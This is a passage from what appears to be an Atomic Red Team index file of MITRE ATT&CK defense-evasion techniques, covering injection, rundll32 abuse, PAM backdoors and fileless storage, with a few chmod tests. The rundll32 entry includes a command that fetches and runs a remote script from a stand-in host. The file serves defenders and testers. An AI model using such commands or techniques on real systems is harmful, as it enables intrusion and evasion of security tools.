--- defense-evasion: T1055.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298 created: '2020-01-14T17:18:32.126Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1055/011 external_id: T1055.011 - source_name: Microsoft Window Classes description: Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx - source_name: Microsoft GetWindowLong function description: Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx - source_name: Microsoft SetWindowLong function description: Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017. url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx - source_name: Elastic Process Injection July 2017 description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - source_name: MalwareTech Power Loader Aug 2013 description: MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017. url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html - source_name: WeLiveSecurity Gapz and Redyms Mar 2013 description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017. url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ - source_name: Microsoft SendNotifyMessage function description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017. 
url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:19.059Z' name: 'Process Injection: Extra Window Memory Injection' description: "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. 
Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1055.011 atomic_tests: [] T1205.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520 created: '2022-09-30T21:18:41.930Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1205/002 external_id: T1205.002 - source_name: exatrack bpf filters passive backdoors description: 'ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.' url: https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - source_name: crowdstrike bpf socket filters description: 'Jamie Harries. 
(2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.' url: https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/ - source_name: Leonardo Turla Penquin May 2020 description: Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021. url: https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf - source_name: haking9 libpcap network sniffing description: 'Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.' url: http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:19.274Z' name: Socket Filters description: |- Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. 
Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020) Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tim (Wadhwa-)Brown - CrowdStrike x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1027.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939 created: '2023-03-23T19:55:25.546Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/011 external_id: T1027.011 - source_name: Aquasec Muhstik Malware 2024 description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message Queuing Services Applications. Retrieved September 24, 2024." url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/ - source_name: Bitsight 7777 Botnet description: Batista, João. Gi7w0rm. (2024, August 27). 
Retrieved June 5, 2025. url: https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet - source_name: CISCO Nexus 900 Config description: CISCO. (2021, September 14). Cisco Nexus 9000 Series NX-OS Fundamentals Configuration Guide, Release 7.x. Retrieved June 5, 2025. url: https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus9000/sw/7-x/fundamentals/configuration/guide/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x_chapter_01000.html - source_name: Elastic Binary Executed from Shared Memory Directory description: Elastic. (n.d.). Binary Executed from Shared Memory Directory. Retrieved September 24, 2024. url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html - source_name: SecureList Fileless description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware. Retrieved March 23, 2023. url: https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/ - source_name: Microsoft Fileless description: Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023. url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats - source_name: Sysdig Fileless Malware 23022 description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved September 24, 2024. url: https://sysdig.com/blog/containers-read-only-fileless-malware/ - source_name: Akami Frog4Shell 2024 description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet Adds One-Days to Its Arsenal. Retrieved September 24, 2024. 
url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-06-05T15:30:20.139Z' name: Fileless Storage description: "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). 
Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Christopher Peacock - Denise Tan - Mark Wee - Simona David - Xavier Rousseau - Vito Alfano, Group-IB x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Linux x_mitre_version: '2.1' atomic_tests: [] T1218.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5 created: '2020-01-23T18:03:46.248Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/011 external_id: T1218.011 - source_name: rundll32.exe defense evasion description: Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022. url: https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/ - source_name: Attackify Rundll32.exe Obscurity description: Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. url: https://www.attackify.com/blog/rundll32_execution_order/ - source_name: This is Security Command Line Confusion description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. url: https://www.stormshield.com/news/poweliks-command-line-confusion/ - source_name: Github NoRunDll description: gtworek. 
(2019, December 17). NoRunDll. Retrieved August 23, 2021. url: https://github.com/gtworek/PSBits/tree/master/NoRunDll - source_name: lolbas project Ieframe.dll description: lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025. url: https://lolbas-project.github.io/lolbas/Libraries/Ieframe/ - source_name: lolbas project Zipfldr.dll description: lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025. url: https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/ - source_name: Trend Micro CPL description: Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017. url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:20.567Z' name: 'Signed Binary Proxy Execution: Rundll32' description: "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. 
This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" \ This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Gareth Phillips, Seek Ltd. 
- Casey Smith - Ricardo Dias - James_inthe_box, Me - Amir Hossein Vafifar x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.5' identifier: T1218.011 atomic_tests: [] T1027.009: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1 created: '2022-09-30T18:50:14.351Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/009 external_id: T1027.009 - source_name: GitHub PSImage description: Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022. url: https://github.com/peewpw/Invoke-PSImage - source_name: Malware Analysis Report ComRAT description: 'CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.' url: https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a - source_name: Trend Micro description: Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022. url: https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html - source_name: Securelist Dtrack2 description: KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022. url: https://securelist.com/my-name-is-dtrack/93338/ - source_name: Microsoft Learn description: Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022. url: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1 - source_name: SentinelLabs reversing run-only applescripts 2021 description: Phil Stokes. (2021, January 11). 
FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022. url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/ - source_name: Sentinel Labs description: Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022. url: https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:03.051Z' name: Embedded Payloads description: "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then 
injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Nick Cairns, @grotezinfosec x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.2' atomic_tests: [] T1556.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771 created: '2020-06-26T04:01:09.648Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1556/003 external_id: T1556.003 - source_name: Apple PAM description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020. url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt - source_name: Man Pam_Unix description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020. url: https://linux.die.net/man/8/pam_unix - source_name: PAM Creds description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved November 17, 2024. url: https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/ - source_name: Red Hat PAM description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020. 
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules - source_name: PAM Backdoor description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020. url: https://github.com/zephrax/linux-pam-backdoor object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:21.118Z' name: 'Modify Authentication Process: Pluggable Authentication Modules' description: |- Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor) Malicious modifications to the PAM system may also be abused to steal credentials. 
Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Scott Knight, @sdotknight, VMware Carbon Black - George Allen, VMware Carbon Black x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '2.1' identifier: T1556.003 atomic_tests: [] T1578.004: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1 created: '2020-06-16T18:42:20.734Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1578/004 external_id: T1578.004 - source_name: Tech Republic - Restore AWS Snapshots description: Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019. url: https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/ - source_name: Google - Restore Cloud Snapshot description: Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019. 
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:21.210Z' name: Revert Cloud Instance description: |- An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Netskope x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.2' atomic_tests: [] T1564.012: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9 created: '2024-03-29T16:59:10.374Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/012 external_id: T1564.012 - source_name: Microsoft File Folder Exclusions description: Microsoft. (2024, February 27). Contextual file and folder exclusions. Retrieved March 29, 2024. 
url: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:35:31.731Z' name: File/Path Exclusions description: |- Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions) Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment. 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1222.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345 created: '2020-02-04T19:24:27.774Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1222/002 external_id: T1222.002 - source_name: Hybrid Analysis Icacls1 June 2018 description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - source_name: Hybrid Analysis Icacls2 May 2018 description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - source_name: 20 macOS Common Tools and Techniques description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. 
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:21.839Z' name: 'File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification' description: "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversaries may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. 
Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - macOS - Linux x_mitre_version: '1.2' identifier: T1222.002 atomic_tests: - name: chmod - Change file or folder mode (numeric mode) auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. ' supported_platforms: - linux - macos input_arguments: numeric_mode: description: Specified numeric mode value type: integer default: 755 file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod #{numeric_mode} #{file_or_folder} ' name: sh - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic 